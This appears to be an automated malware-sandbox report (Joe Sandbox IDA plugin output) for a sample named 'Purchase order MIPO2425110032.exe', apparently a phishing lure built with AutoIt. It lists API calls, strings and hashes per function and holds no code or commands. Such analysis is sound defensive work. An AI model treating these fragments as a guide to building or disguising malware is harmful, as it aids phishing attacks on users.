                                                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                            APIs
                                                            • CreateMenu.USER32 ref: 00448603
                                                            • SetMenu.USER32(?,00000000), ref: 00448613
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                            • IsMenu.USER32(?), ref: 004486AB
                                                            • CreatePopupMenu.USER32 ref: 004486B5
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                            • DrawMenuBar.USER32 ref: 004486F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID: 0
                                                            • API String ID: 161812096-4108050209
                                                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe), ref: 00434057
                                                            • LoadStringW.USER32(00000000), ref: 00434060
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                            • LoadStringW.USER32(00000000), ref: 00434078
                                                            • _wprintf.LIBCMT ref: 004340A1
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                            Strings
                                                            • C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, xrefs: 00434040
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 3648134473-3548557895
                                                            • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                            • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                            • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                            • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • Opcode ID: 2be63c4c740bed6b13276cd9094d24fb509619a89e5ede4690664bcfa53046fb
                                                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                            • Opcode Fuzzy Hash: 2be63c4c740bed6b13276cd9094d24fb509619a89e5ede4690664bcfa53046fb
                                                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                            • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                            • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                            • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,0040F545,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,004A90E8,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                            • API String ID: 978794511-0
                                                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memcmp
                                                            • String ID: '$\$h
                                                            • API String ID: 2205784470-1303700344
                                                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                            • VariantClear.OLEAUT32 ref: 0045EA6D
                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                            • __swprintf.LIBCMT ref: 0045EC33
                                                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                            Strings
                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                            • API String ID: 2441338619-1568723262
                                                            • Opcode ID: 75bf3760ea25d7c4a5a573425a2ad46220e67879b264479de051e46cf1f5c899
                                                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                            • Opcode Fuzzy Hash: 75bf3760ea25d7c4a5a573425a2ad46220e67879b264479de051e46cf1f5c899
                                                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                            • String ID: @COM_EVENTOBJ
                                                            • API String ID: 327565842-2228938565
                                                            • Opcode ID: 2d2e6611baaaed01bf0ac91f3b08fe096b6b0ff8b1e1267574a63fcd06cc1b28
                                                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                            • Opcode Fuzzy Hash: 2d2e6611baaaed01bf0ac91f3b08fe096b6b0ff8b1e1267574a63fcd06cc1b28
                                                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                            APIs
                                                            • VariantClear.OLEAUT32(?), ref: 0047031B
                                                            • VariantClear.OLEAUT32(?), ref: 0047044F
                                                            • VariantInit.OLEAUT32(?), ref: 004704A3
                                                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                            • VariantClear.OLEAUT32(?), ref: 00470516
                                                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                            • String ID: H
                                                            • API String ID: 3613100350-2852464175
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                            • DestroyWindow.USER32(?), ref: 00426F50
                                                            • UnregisterHotKey.USER32(?), ref: 00426F77
                                                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                            Strings
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 4174999648-3243417748
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Strings
                                                            Similarity
                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 1291720006-3916222277
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                            • IsMenu.USER32(?), ref: 0045FC5F
                                                            • CreatePopupMenu.USER32 ref: 0045FC97
                                                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                            Strings
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 0$2
                                                            • API String ID: 93392585-3793063076
                                                            APIs
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                            • VariantClear.OLEAUT32(?), ref: 00435320
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                            • VariantClear.OLEAUT32(?), ref: 004353B3
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                            Strings
                                                            Similarity
                                                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                            • String ID: crts
                                                            • API String ID: 586820018-3724388283
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,0040F545,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,004A90E8,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,?,0040F545), ref: 0041013C
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                            • _wcscat.LIBCMT ref: 0044BCAF
                                                            • _wcslen.LIBCMT ref: 0044BCBB
                                                            • _wcslen.LIBCMT ref: 0044BCD1
                                                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                            Strings
                                                            Similarity
                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 2326526234-1173974218
                                                            APIs
                                                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                            • _wcslen.LIBCMT ref: 004335F2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                            • GetLastError.KERNEL32 ref: 0043362B
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                            • _wcsrchr.LIBCMT ref: 00433666
                                                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                            Strings
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                            • String ID: \
                                                            • API String ID: 321622961-2967466578
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                            • __lock.LIBCMT ref: 00417981
                                                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                            • __lock.LIBCMT ref: 004179A2
                                                            • ___addlocaleref.LIBCMT ref: 004179C0
                                                            Strings
                                                            Similarity
                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                            • String ID: KERNEL32.DLL$pI
                                                            • API String ID: 637971194-197072765
                                                            APIs
                                                            Similarity
                                                            • API ID: _memmove$_malloc
                                                            • String ID:
                                                            • API String ID: 1938898002-0
                                                            • Opcode ID: 4bcc40ca92a1d17c02367a7b98f2c7558718af87d85a6ef857034364532bb056
                                                            • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                            • Opcode Fuzzy Hash: 4bcc40ca92a1d17c02367a7b98f2c7558718af87d85a6ef857034364532bb056
                                                            • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                            • _memmove.LIBCMT ref: 0044B555
                                                            • _memmove.LIBCMT ref: 0044B578
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                            • String ID:
                                                            • API String ID: 2737351978-0
                                                            • Opcode ID: d98191905aa97e4122969528db3a0c931e11f5e9452d4c2314ea804c33bdb993
                                                            • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                            • Opcode Fuzzy Hash: d98191905aa97e4122969528db3a0c931e11f5e9452d4c2314ea804c33bdb993
                                                            • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                            • __calloc_crt.LIBCMT ref: 00415246
                                                            • __getptd.LIBCMT ref: 00415253
                                                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                            • _free.LIBCMT ref: 0041529E
                                                            • __dosmaperr.LIBCMT ref: 004152A9
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 3638380555-0
                                                            • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                            • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ClearErrorInitLast
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 3207048006-625585964
                                                            • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                            • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                            • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                            • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                            • gethostbyname.WSOCK32(?), ref: 004655A6
                                                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                            • _memmove.LIBCMT ref: 004656CA
                                                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                            • WSACleanup.WSOCK32 ref: 00465762
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                            • String ID:
                                                            • API String ID: 2945290962-0
                                                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                            APIs
                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                            • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                            • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
